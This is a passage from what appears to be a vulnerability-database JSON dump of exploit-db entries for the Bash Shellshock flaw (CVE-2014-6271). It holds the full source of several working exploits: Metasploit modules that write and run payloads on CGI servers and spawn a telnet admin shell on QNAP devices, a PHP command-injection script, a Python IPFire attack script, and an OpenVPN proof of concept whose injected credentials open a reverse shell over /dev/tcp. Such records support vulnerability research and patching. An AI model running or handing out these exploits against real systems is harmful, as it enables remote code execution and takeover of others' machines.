name=\"DEVICE_URI\"))\r\n\r\n data = pd.to_s\r\n data.strip!\r\n\r\n send_request_cgi(\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri.path, 'admin'),\r\n 'ctype' => \"multipart/form-data; boundary=#{pd.bound}\",\r\n 'data' => data,\r\n 'cookie' => \"org.cups.sid=#{@cookie};\",\r\n 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])\r\n )\r\n end\r\n\r\n #\r\n # Queue a printer test page\r\n #\r\n def print_test_page(printer_name)\r\n vprint_status(\"#{peer} - Adding test page to printer queue\")\r\n send_request_cgi(\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri.path, 'printers', printer_name),\r\n 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),\r\n 'cookie' => \"org.cups.sid=#{@cookie}\",\r\n 'vars_post' => {\r\n 'org.cups.sid' => @cookie,\r\n 'OP' => 'print-test-page'\r\n }\r\n )\r\n end\r\n\r\n #\r\n # Delete a printer\r\n #\r\n def delete_printer(printer_name)\r\n vprint_status(\"#{peer} - Deleting printer '#{printer_name}'\")\r\n send_request_cgi(\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri.path, 'admin'),\r\n 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),\r\n 'cookie' => \"org.cups.sid=#{@cookie}\",\r\n 'vars_post' => {\r\n 'org.cups.sid' => @cookie,\r\n 'OP' => 'delete-printer',\r\n 'printer_name' => printer_name,\r\n 'confirm' => 'Delete Printer'\r\n }\r\n )\r\n end\r\n\r\nend", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/35115/"}, {"lastseen": "2016-02-04T00:10:05", "description": "Bash - CGI RCE (MSF) Shellshock Exploit. CVE-2014-3659,CVE-2014-3671,CVE-2014-6271,CVE-2014-62771,CVE-2014-7169,CVE-2014-7196,CVE-2014-7227,CVE-2014-7910. We...", "published": "2014-10-06T00:00:00", "type": "exploitdb", "title": "Bash - CGI RCE MSF Shellshock Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-3659", "CVE-2014-62771", "CVE-2014-7227", "CVE-2014-7169", "CVE-2014-6271", "CVE-2014-3671", "CVE-2014-7910", "CVE-2014-7196"], "modified": "2014-10-06T00:00:00", "id": "EDB-ID:34895", "href": "https://www.exploit-db.com/exploits/34895/", "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::EXE\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Shellshock Bashed CGI RCE',\r\n 'Description' => %q{\r\n This module exploits the shellshock vulnerability in apache cgi. It allows you to\r\n excute any metasploit payload you want.\r\n },\r\n 'Author' =>\r\n [\r\n 'Stephane Chazelas',\t# vuln discovery\r\n 'Fady Mohamed Osman'\t# Metasploit module f.othman at zinad.net\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'CVE', '2014-6271' ]\r\n ],\r\n 'Payload'\t =>\r\n {\r\n 'BadChars' => \"\",\r\n },\r\n 'Platform' => 'linux',\r\n 'Arch'\t\t => ARCH_X86,\r\n 'Targets' =>\r\n [\r\n [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Aug 13 2014'))\r\n\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'The CGI url', '/cgi-bin/test.sh']) ,\r\n OptString.new('FILEPATH', [true, 'The url ', '/tmp'])\r\n ], self.class)\r\n end\r\n\r\n def exploit\r\n @payload_name = \"#{rand_text_alpha(5)}\"\r\n full_path = datastore['FILEPATH'] + '/' + @payload_name\r\n payload_exe = generate_payload_exe\r\n if payload_exe.blank?\r\n fail_with(Failure::BadConfig, \"#{peer} - Failed to generate the ELF, select a native payload\")\r\n end\r\n peer = \"#{rhost}:#{rport}\"\r\n print_status(\"#{peer} - Creating payload #{full_path}\")\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => datastore['TARGETURI'],\r\n 'agent' => \"() { :;}; /bin/bash -c \\\"\" + \"printf \" + \"\\'\" + Rex::Text.hexify(payload_exe).gsub(\"\\n\",'') + \"\\'\" + \"> #{full_path}; chmod +x #{full_path};#{full_path};rm #{full_path};\\\"\"\r\n })\r\n end\r\nend", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/34895/"}, {"lastseen": "2016-02-04T03:40:08", "description": "QNAP - Web Server Remote Code Execution via Bash Environment Variable Code Injection. CVE-2014-3659,CVE-2014-3671,CVE-2014-6271,CVE-2014-62771,CVE-2014-7169,...", "published": "2015-03-26T00:00:00", "type": "exploitdb", "title": "QNAP - Web Server Remote Code Execution via Bash Environment Variable Code Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-3659", "CVE-2014-62771", "CVE-2014-7227", "CVE-2014-7169", "CVE-2014-6271", "CVE-2014-3671", "CVE-2014-7910", "CVE-2014-7196"], "modified": "2015-03-26T00:00:00", "id": "EDB-ID:36504", "href": "https://www.exploit-db.com/exploits/36504/", "sourceData": "# Exploit Title: QNAP Web server remote code execution via Bash Environment Variable Code Injection\r\n# Date: 7 February 2015\r\n# Exploit Author: Patrick Pellegrino | 0x700x700x650x6c0x6c0x650x670x720x690x6e0x6f@securegroup.it [work] / 0x640x330x760x620x700x70@gmail.com [other]\r\n# Employer homepage: http://www.securegroup.it\r\n# Vendor homepage: http://www.qnap.com\r\n# Version: All Turbo NAS models except TS-100, TS-101, TS-200\r\n# Tested on: TS-1279U-RP\r\n# CVE : 2014-6271\r\n# Vendor URL bulletin : http://www.qnap.com/i/it/support/con_show.php?cid=61\r\n\r\n\r\n##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/d3vpp/metasploit-modules\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Auxiliary\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'QNAP Web server remote code execution via Bash Environment Variable Code Injection',\r\n 'Description' => %q{\r\n\t\tThis module allows you to inject unix command with the same user who runs the http service - admin - directly on the QNAP system.\r\n\t\tAffected products:\r\n\t\tAll Turbo NAS models except TS-100, TS-101, TS-200\r\n\t\t},\r\n 'Author' => ['Patrick Pellegrino'], # Metasploit module | 0x700x700x650x6c0x6c0x650x670x720x690x6e0x6f@securegroup.it [work] / 0x640x330x760x620x700x70@gmail.com [other]\r\n 'License' => MSF_LICENSE,\r\n 'References' => [\r\n\t\t\t['CVE', '2014-6271'], #aka ShellShock\r\n\t\t\t['URL', 'http://www.qnap.com/i/it/support/con_show.php?cid=61']\r\n\t\t],\r\n 'Platform' => ['unix']\r\n ))\r\n\r\n register_options([\r\n OptString.new('TARGETURI', [true, 'Path to CGI script','/cgi-bin/index.cgi']),\r\n OptString.new('CMD', [ true, 'The command to run', '/bin/cat /etc/passwd'])\r\n ], self.class)\r\n end\r\n\r\n def check\r\n\tbegin\r\n \tres = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri.path),\r\n 'agent' => \"() { :;}; echo; /usr/bin/id\"\r\n })\r\n\trescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE\r\n\t\tvprint_error(\"Connection failed\")\r\n\t\treturn Exploit::CheckCode::Unknown\r\n end\r\n\t\r\n if !res\r\n return Exploit::CheckCode::Unknown\r\n elsif res.code== 302 and res.body.include? 'uid'\r\n\t return Exploit::CheckCode::Vulnerable\r\n end\r\n return Exploit::CheckCode::Safe\r\n end\r\n\t\r\n\r\n def run\r\n\r\n\tres = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri.path),\r\n 'agent' => \"() { :;}; echo; #{datastore['CMD']}\"\r\n })\r\n\t\r\n\tif res.body.empty?\r\n\t\tprint_error(\"No data found.\")\r\n\telsif res.code== 302\r\n\t\tprint_status(\"#{rhost}:#{rport} - bash env variable injected\")\r\n\t\tputs \" \"\r\n\t\tprint_line(res.body)\r\n end\r\n\tend\r\n\t\r\nend\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/36504/"}, {"lastseen": "2016-02-03T23:53:49", "description": "Bash - Environment Variables Code Injection Exploit (ShellShock). CVE-2014-3659,CVE-2014-3671,CVE-2014-6271,CVE-2014-62771,CVE-2014-7169,CVE-2014-7196,CVE-20...", "published": "2014-09-25T00:00:00", "type": "exploitdb", "title": "Bash - Environment Variables Code Injection Exploit ShellShock", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-3659", "CVE-2014-62771", "CVE-2014-7227", "CVE-2014-7169", "CVE-2014-6271", "CVE-2014-3671", "CVE-2014-7910", "CVE-2014-7196"], "modified": "2014-09-25T00:00:00", "id": "EDB-ID:34766", "href": "https://www.exploit-db.com/exploits/34766/", "sourceData": "<?php\r\n/*\r\nTitle: Bash Specially-crafted Environment Variables Code Injection Vulnerability\r\nCVE: 2014-6271\r\nVendor Homepage: https://www.gnu.org/software/bash/\r\nAuthor: Prakhar Prasad && Subho Halder\r\nAuthor Homepage: https://prakharprasad.com && https://appknox.com\r\nDate: September 25th 2014\r\nTested on: Mac OS X 10.9.4/10.9.5 with Apache/2.2.26\r\n\t GNU bash, version 3.2.51(1)-release (x86_64-apple-darwin13)\r\nUsage: php bash.php -u http://<hostname>/cgi-bin/<cgi> -c cmd\r\n\t Eg. php bash.php -u http://localhost/cgi-bin/hello -c \"wget http://appknox.com -O /tmp/shit\"\r\nReference: https://www.reddit.com/r/netsec/comments/2hbxtc/cve20146271_remote_code_execution_through_bash/\r\n\r\nTest CGI Code : #!/bin/bash\r\n\t\t\t\techo \"Content-type: text/html\"\r\n\t\t\t\techo \"\"\r\n\t\t\t\techo \"Bash-is-Vulnerable\"\r\n\r\n*/\r\nerror_reporting(0);\r\nif(!defined('STDIN')) die(\"Please run it through command-line!\\n\");\r\n$x = getopt(\"u:c:\");\r\nif(!isset($x['u']) || !isset($x['c']))\r\n{\r\n\tdie(\"Usage: \".$_SERVER['PHP_SELF'].\" -u URL -c cmd\\n\");\r\n\r\n}\r\n$url = $x['u'];\r\n$cmd = $x['c'];\r\n\r\n$context = stream_context_create(\r\n\tarray(\r\n\t\t'http' => array(\r\n\t\t\t'method' => 'GET',\r\n\t\t\t'header' => 'User-Agent: () { :;}; /bin/bash -c \"'.$cmd.'\"'\r\n\t\t)\r\n\t)\r\n);\r\n$req = file_get_contents($url, false, $context);\r\nif(!$req && strpos($http_response_header[0],\"500\") > 0 )\r\n\tdie(\"Command sent to the server!\\n\");\r\nelse if($req && !strpos($http_response_header[0],\"500\") > 0)\r\n\tdie(\"Server didn't respond as it should!\\n\");\r\nelse if(!$req && $http_response_header == NULL)\r\n\tdie(\"A connection error occurred!\\n\")\r\n?>\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/34766/"}, {"lastseen": "2016-02-04T00:02:31", "description": "IPFire Cgi Web Interface Authenticated Bash Environment Variable Code Injection Exploit. CVE-2014-3659,CVE-2014-3671,CVE-2014-6271,CVE-2014-62771,CVE-2014-71...", "published": "2014-10-01T00:00:00", "type": "exploitdb", "title": "IPFire Cgi Web Interface Authenticated Bash Environment Variable Code Injection Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-3659", "CVE-2014-62771", "CVE-2014-7227", "CVE-2014-7169", "CVE-2014-6271", "CVE-2014-3671", "CVE-2014-7910", "CVE-2014-7196"], "modified": "2014-10-01T00:00:00", "id": "EDB-ID:34839", "href": "https://www.exploit-db.com/exploits/34839/", "sourceData": "#!/usr/bin/env python\r\n#\r\n# Exploit Title : IPFire <= 2.15 core 82 Authenticated cgi Remote Command Injection (ShellShock)\r\n#\r\n# Exploit Author : Claudio Viviani\r\n#\r\n# Vendor Homepage : http://www.ipfire.org\r\n#\r\n# Software Link: http://downloads.ipfire.org/releases/ipfire-2.x/2.15-core82/ipfire-2.15.i586-full-core82.iso\r\n#\r\n# Date : 2014-09-29\r\n#\r\n# Fixed version: IPFire 2.15 core 83 (2014-09-28)\r\n#\r\n# Info: IPFire is a free Linux distribution which acts as a router and firewall in the first instance.\r\n# It can be maintained via a web interface.\r\n# The distribution furthermore offers selected server-daemons and can easily be expanded to a SOHO-server.\r\n# IPFire is based on Linux From Scratch and is, like the Endian Firewall, originally a fork from IPCop.\r\n#\r\n# Vulnerability: IPFire <= 2.15 core 82 Cgi Web Interface suffers from Authenticated Bash Environment Variable Code Injection\r\n# (CVE-2014-6271)\r\n#\r\n# Suggestion:\r\n#\r\n# If you can't update the distro and you have installed ipfire via image files (Arm, Flash)\r\n# make sure to change the default access permission to graphical user interface (user:admin pass:ipfire)\r\n#\r\n#\r\n# http connection\r\nimport urllib2\r\n# Basic Auth management Base64\r\nimport base64\r\n# Args management\r\nimport optparse\r\n# Error management\r\nimport sys\r\n\r\nbanner = \"\"\"\r\n ___ _______ _______ __ _______ __\r\n | | _ | _ |__.----.-----. | _ .-----|__|\r\n |. |. 1 |. 1___| | _| -__| |. 1___| _ | |\r\n |. |. ____|. __) |__|__| |_____| |. |___|___ |__|\r\n |: |: | |: | |: 1 |_____|\r\n |::.|::.| |::.| |::.. . |\r\n `---`---' `---' `-------'\r\n _______ __ __ __ _______ __ __\r\n | _ | |--.-----| | | _ | |--.-----.----| |--.\r\n | 1___| | -__| | | 1___| | _ | __| <\r\n |____ |__|__|_____|__|__|____ |__|__|_____|____|__|__|\r\n |: 1 | |: 1 |\r\n |::.. . | |::.. . |\r\n `-------' `-------'\r\n\r\n IPFire <= 2.15 c0re 82 Authenticated\r\n Cgi Sh3llSh0ck r3m0t3 C0mm4nd Inj3ct10n\r\n\r\n Written by:\r\n\r\n Claudio Viviani\r\n\r\n http://www.homelab.it\r\n\r\n info@homelab.it\r\n homelabit@protonmail.ch\r\n\r\n https://www.facebook.com/homelabit\r\n https://twitter.com/homelabit\r\n https://plus.google.com/+HomelabIt1/\r\n https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww\r\n\"\"\"\r\n\r\n# Check url\r\ndef checkurl(url):\r\n if url[:8] != \"https://\" and url[:7] != \"http://\":\r\n print('[X] You must insert http:// or https:// procotol')\r\n sys.exit(1)\r\n else:\r\n return url\r\n\r\ndef connectionScan(url,user,pwd,cmd):\r\n print '[+] Connection in progress...'\r\n try:\r\n response = urllib2.Request(url)\r\n content = urllib2.urlopen(response)\r\n print '[X] IPFire Basic Authentication not found'\r\n except urllib2.HTTPError, e:\r\n if e.code == 404:\r\n print '[X] Page not found'\r\n elif e.code == 401:\r\n try:\r\n print '[+] Authentication in progress...'\r\n base64string = base64.encodestring('%s:%s' % (user, pwd)).replace('\\n', '')\r\n headers = {'VULN' : '() { :;}; echo \"H0m3l4b1t\"; /bin/bash -c \"'+cmd+'\"' }\r\n response = urllib2.Request(url, None, headers)\r\n response.add_header(\"Authorization\", \"Basic %s\" % base64string)\r\n content = urllib2.urlopen(response).read()\r\n if \"ipfire\" in content:\r\n print '[+] Username & Password: OK'\r\n print '[+] Checking for vulnerability...'\r\n if 'H0m3l4b1t' in content:\r\n print '[!] Command \"'+cmd+'\": INJECTED!'\r\n else:\r\n print '[X] Not Vulnerable :('\r\n else:\r\n print '[X] No IPFire page found'\r\n except urllib2.HTTPError, e:\r\n if e.code == 401:\r\n print '[X] Wrong username or password'\r\n else:\r\n print '[X] HTTP Error: '+str(e.code)\r\n except urllib2.URLError:\r\n print '[X] Connection Error'\r\n else:\r\n print '[X] HTTP Error: '+str(e.code)\r\n except urllib2.URLError:\r\n print '[X] Connection Error'\r\n\r\ncommandList = optparse.OptionParser('usage: %prog -t https://target:444/ -u admin -p pwd -c \"touch /tmp/test.txt\"')\r\ncommandList.add_option('-t', '--target', action=\"store\",\r\n help=\"Insert TARGET URL\",\r\n )\r\ncommandList.add_option('-c', '--cmd', action=\"store\",\r\n help=\"Insert command name\",\r\n )\r\ncommandList.add_option('-u', '--user', action=\"store\",\r\n help=\"Insert username\",\r\n )\r\ncommandList.add_option('-p', '--pwd', action=\"store\",\r\n help=\"Insert password\",\r\n )\r\noptions, remainder = commandList.parse_args()\r\n\r\n# Check args\r\nif not options.target or not options.cmd or not options.user or not options.pwd:\r\n print(banner)\r\n commandList.print_help()\r\n sys.exit(1)\r\n\r\nprint(banner)\r\n\r\nurl = checkurl(options.target)\r\ncmd = options.cmd\r\nuser = options.user\r\npwd = options.pwd\r\n\r\nconnectionScan(url,user,pwd,cmd)\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/34839/"}, {"lastseen": "2016-02-04T03:40:00", "description": "QNAP - Admin Shell via Bash Environment Variable Code Injection. CVE-2014-3659,CVE-2014-3671,CVE-2014-6271,CVE-2014-62771,CVE-2014-7169,CVE-2014-7196,CVE-201...", "published": "2015-03-26T00:00:00", "type": "exploitdb", "title": "QNAP - Admin Shell via Bash Environment Variable Code Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-3659", "CVE-2014-62771", "CVE-2014-7227", "CVE-2014-7169", "CVE-2014-6271", "CVE-2014-3671", "CVE-2014-7910", "CVE-2014-7196"], "modified": "2015-03-26T00:00:00", "id": "EDB-ID:36503", "href": "https://www.exploit-db.com/exploits/36503/", "sourceData": "# Exploit Title: QNAP admin shell via Bash Environment Variable Code Injection\r\n# Date: 7 February 2015\r\n# Exploit Author: Patrick Pellegrino | 0x700x700x650x6c0x6c0x650x670x720x690x6e0x6f@securegroup.it [work] / 0x640x330x760x620x700x70@gmail.com [other]\r\n# Employer homepage: http://www.securegroup.it\r\n# Vendor homepage: http://www.qnap.com\r\n# Version: All Turbo NAS models except TS-100, TS-101, TS-200\r\n# Tested on: TS-1279U-RP\r\n# CVE : 2014-6271\r\n# Vendor URL bulletin : http://www.qnap.com/i/it/support/con_show.php?cid=61\r\n\r\n\r\n##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/d3vpp/metasploit-modules\r\n##\r\n\r\nrequire 'msf/core'\r\nrequire 'net/telnet'\r\n\r\nclass Metasploit3 < Msf::Auxiliary\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Auxiliary::CommandShell\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'QNAP admin shell via Bash Environment Variable Code Injection',\r\n 'Description' => %q{\r\n\t\tThis module allows you to spawn a remote admin shell (utelnetd) on a QNAP device via Bash Environment Variable Code Injection.\r\n\t\tAffected products:\r\n\t\tAll Turbo NAS models except TS-100, TS-101, TS-200\r\n\t\t},\r\n 'Author' => ['Patrick Pellegrino'], # Metasploit module | 0x700x700x650x6c0x6c0x650x670x720x690x6e0x6f@securegroup.it [work] / 0x640x330x760x620x700x70@gmail.com [other]\r\n 'License' => MSF_LICENSE,\r\n 'References' => [\r\n\t\t\t['CVE', '2014-6271'], #aka ShellShock\r\n\t\t\t['URL', 'http://www.qnap.com/i/it/support/con_show.php?cid=61']\r\n\t\t],\r\n 'Platform' => ['unix']\r\n ))\r\n\r\n register_options([\r\n OptString.new('TARGETURI', [true, 'Path to CGI script','/cgi-bin/index.cgi']),\r\n OptPort.new('LTELNET', [true, 'Set the remote port where the utelnetd service will be listening','9993'])\r\n ], self.class)\r\n end\r\n\r\n def check\r\n\tbegin\r\n \tres = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri.path),\r\n 'agent' => \"() { :;}; echo; /usr/bin/id\"\r\n })\r\n\trescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE\r\n\t\tvprint_error(\"Connection failed\")\r\n\t\treturn Exploit::CheckCode::Unknown\r\n end\r\n\t\r\n if !res\r\n return Exploit::CheckCode::Unknown\r\n elsif res.code== 302 and res.body.include? 'uid'\r\n\t return Exploit::CheckCode::Vulnerable\r\n end\r\n return Exploit::CheckCode::Safe\r\n end\r\n\t\r\n\r\n def exploit_telnet()\r\n telnetport = datastore['LTELNET']\r\n\r\n print_status(\"#{rhost}:#{rport} - Telnet port used: #{telnetport}\")\r\n\r\n print_status(\"#{rhost}:#{rport} - Sending exploit\")\r\n begin\r\n sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i })\r\n\r\n if sock\r\n print_good(\"#{rhost}:#{rport} - Backdoor service spawned\")\r\n add_socket(sock)\r\n else\r\n fail_with(Exploit::Failure::Unknown, \"#{rhost}:#{rport} - Backdoor service not spawned\")\r\n end\r\n\r\n print_status \"Starting a Telnet session #{rhost}:#{telnetport}\"\r\n merge_me = {\r\n 'USERPASS_FILE' => nil,\r\n 'USER_FILE' => nil,\r\n 'PASS_FILE' => nil,\r\n 'USERNAME' => nil,\r\n 'PASSWORD' => nil\r\n }\r\n start_session(self, \"TELNET (#{rhost}:#{telnetport})\", merge_me, false, sock)\r\n rescue\r\n fail_with(Exploit::Failure::Unknown, \"#{rhost}:#{rport} - Backdoor service not handled\")\r\n end\r\n return\r\n end\r\n\r\n def run\r\n\tbegin\r\n\ttelnetport = datastore['LTELNET']\r\n\tres = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri.path),\r\n 'agent' => \"() { :;}; /bin/utelnetd -l/bin/sh -p#{telnetport} &\"\r\n })\t\t \r\n rescue Rex::ConnectionRefused, Rex::ConnectionTimeout,\r\n Rex::HostUnreachable => e\r\n fail_with(Failure::Unreachable, e)\r\n ensure\r\n disconnect\r\n end\r\n\texploit_telnet()\r\n \r\n end\r\n\t\r\nend\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/36503/"}, {"lastseen": "2016-02-04T00:07:57", "description": "OpenVPN 2.2.29 - ShellShock Exploit. CVE-2014-3659,CVE-2014-3671,CVE-2014-6271,CVE-2014-62771,CVE-2014-7169,CVE-2014-7196,CVE-2014-7227,CVE-2014-7910. Remote...", "published": "2014-10-04T00:00:00", "type": "exploitdb", "title": "OpenVPN 2.2.29 - ShellShock Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-3659", "CVE-2014-62771", "CVE-2014-7227", "CVE-2014-7169", "CVE-2014-6271", "CVE-2014-3671", "CVE-2014-7910", "CVE-2014-7196"], "modified": "2014-10-04T00:00:00", "id": "EDB-ID:34879", "href": "https://www.exploit-db.com/exploits/34879/", "sourceData": "# Exploit Title: ShellShock OpenVPN Exploit\r\n\r\n# Date: Fri Oct 3 15:48:08 EDT 2014\r\n\r\n# Exploit Author: hobbily AKA @fj33r\r\n\r\n# Version: 2.2.29\r\n\r\n# Tested on: Debian Linux\r\n\r\n# CVE : CVE-2014-6271\r\n\r\n#Probably should of submitted this the day I tweeted it.\r\n### server.conf\r\nport 1194\r\nproto udp\r\ndev tun\r\nclient-cert-not-required\r\nauth-user-pass-verify /etc/openvpn/user.sh via-env\r\ntmp-dir \"/etc/openvpn/tmp\"\r\nca ca.crt\r\ncert testing.crt\r\nkey testing.key # This file should be kept secret\r\ndh dh1024.pem\r\nserver 10.8.0.0 255.255.255.0\r\nkeepalive 10 120\r\ncomp-lzo\r\nuser nobody\r\ngroup nogroup\r\npersist-key\r\npersist-tun\r\nclient-cert-not-required\r\nplugin /usr/lib/openvpn/openvpn-auth-pam.so login\r\nscript-security 3\r\nstatus openvpn-status.log\r\nverb 3\r\n\r\n### user.sh\r\n#!/bin/bash\r\necho \"$username\"\r\necho \"$password\"\r\n\r\n### start server\r\nopenvpn server.con\r\n\r\n### terminal 1\r\nnc -lp 4444\r\n\r\n### terminal 2\r\nsudo openvpn --client --remote 10.10.0.52 --auth-user-pass --dev tun --ca ca.cert --auth-nocache --comp-lzo\r\n\r\n### username && password were both shellshocked just incase\r\nuser:() { :;};/bin/bash -i >& /dev/tcp/10.10.0.56/4444 0>&1 &\r\npass:() { :;};/bin/bash -i >& /dev/tcp/10.10.0.56/4444 0>&1 &\r\n\r\n### log\r\nMon Sep 29 20:56:56 2014 NOTE: the current --script-security setting may allow this configuration to call user-defined scripts\r\nMon Sep 29 20:56:56 2014 PLUGIN_INIT: POST /usr/lib/openvpn/openvpn-auth-pam.so '[/usr/lib/openvpn/openvpn-auth-pam.so] [login]' intercepted=PLUGIN_AUTH_USER_PASS_VERIFY\r\nMon Sep 29 20:56:56 2014 Diffie-Hellman initialized with 1024 bit key\r\nMon Sep 29 20:56:56 2014 WARNING: POTENTIALLY DANGEROUS OPTION --client-cert-not-required may accept clients which do not present a certificate\r\nMon Sep 29 20:56:56 2014 TLS-Auth MTU parms [ L:1542 D:138 EF:38 EB:0 ET:0 EL:0 ]\r\nMon Sep 29 20:56:56 2014 Socket Buffers: R=[163840->131072] S=[163840->131072]\r\nMon Sep 29 20:56:56 2014 ROUTE default_gateway=10.10.0.1\r\nMon Sep 29 20:56:56 2014 TUN/TAP device tun0 opened\r\nMon Sep 29 20:56:56 2014 TUN/TAP TX queue length set to 100\r\nMon Sep 29 20:56:56 2014 do_ifconfig, tt->ipv6=0, tt->did_ifconfig_ipv6_setup=0\r\nMon Sep 29 20:56:56 2014 /sbin/ifconfig tun0 10.8.0.1 pointopoint 10.8.0.2 mtu 1500\r\nMon Sep 29 20:56:56 2014 /sbin/route add -net 10.8.0.0 netmask 255.255.255.0 gw 10.8.0.2\r\nMon Sep 29 20:56:56 2014 Data Channel MTU parms [ L:1542 D:1450 EF:42 EB:135 ET:0 EL:0 AF:3/1 ]\r\nMon Sep 29 20:56:56 2014 GID set to nogroup\r\nMon Sep 29 20:56:56 2014 UID set to nobody\r\nMon Sep 29 20:56:56 2014 UDPv4 link local (bound): [undef]\r\nMon Sep 29 20:56:56 2014 UDPv4 link remote: [undef]\r\nMon Sep 29 20:56:56 2014 MULTI: multi_init called, r=256 v=256\r\nMon Sep 29 20:56:56 2014 IFCONFIG POOL: base=10.8.0.4 size=62, ipv6=0\r\nMon Sep 29 20:56:56 2014 Initialization Sequence Completed\r\nMon Sep 29 20:57:54 2014 MULTI: multi_create_instance called\r\nMon Sep 29 20:57:54 2014 10.10.0.56:1194 Re-using SSL/TLS context\r\nMon Sep 29 20:57:54 2014 10.10.0.56:1194 LZO compression initialized\r\nMon Sep 29 20:57:54 2014 10.10.0.56:1194 Control Channel MTU parms [ L:1542 D:138 EF:38 EB:0 ET:0 EL:0 ]\r\nMon Sep 29 20:57:54 2014 10.10.0.56:1194 Data Channel MTU parms [ L:1542 D:1450 EF:42 EB:135 ET:0 EL:0 AF:3/1 ]\r\nMon Sep 29 20:57:54 2014 10.10.0.56:1194 Local Options hash (VER=V4): '530fdded'\r\nMon Sep 29 20:57:54 2014 10.10.0.56:1194 Expected Remote Options hash (VER=V4): '41690919'\r\nMon Sep 29 20:57:54 2014 10.10.0.56:1194 TLS: Initial packet from [AF_INET]10.10.0.56:1194, sid=644ea55a 5f832b02\r\nAUTH-PAM: BACKGROUND: user '() { :;};/bin/bash -i >& /dev/tcp/10.10.0.56/4444 0>&1 &' failed to authenticate: Error in service module\r\nMon Sep 29 20:57:57 2014 10.10.0.56:1194 PLUGIN_CALL: POST /usr/lib/openvpn/openvpn-auth-pam.so/PLUGIN_AUTH_USER_PASS_VERIFY status=1\r\nMon Sep 29 20:57:57 2014 10.10.0.56:1194 PLUGIN_CALL: plugin function PLUGIN_AUTH_USER_PASS_VERIFY failed with status 1: /usr/lib/openvpn/openvpn-auth-pam.so\r\n_________/bin/bash_-i____/dev/tcp/10.10.0.56/4444_0__1__\r\n\r\nMon Sep 29 20:57:57 2014 10.10.0.56:1194 TLS Auth Error: Auth Username/Password verification failed for peer\r\nMon Sep 29 20:57:57 2014 10.10.0.56:1194 Control Channel: TLSv1, cipher TLSv1/SSLv3 DHE-RSA-AES256-SHA\r\nMon Sep 29 20:57:57 2014 10.10.0.56:1194 [] Peer Connection Initiated with [AF_INET]10.10.0.56:1194\r\nMon Sep 29 20:57:59 2014 10.10.0.56:1194 PUSH: Received control message: 'PUSH_REQUEST'\r\nMon Sep 29 20:57:59 2014 10.10.0.56:1194 Delayed exit in 5 seconds\r\nMon Sep 29 20:57:59 2014 10.10.0.56:1194 SENT CONTROL [UNDEF]: 'AUTH_FAILED' (status=1)\r\nMon Sep 29 20:58:01 2014 read UDPv4 [ECONNREFUSED]: Connection refused (code=111)\r\nMon Sep 29 20:58:04 2014 10.10.0.56:1194 SIGTERM[soft,delayed-exit] received, client-instance exiting\r\n\r\n### nc listener\r\nnobody@debian:/etc/openvpn$ id\r\nid\r\nuid=65534(nobody) 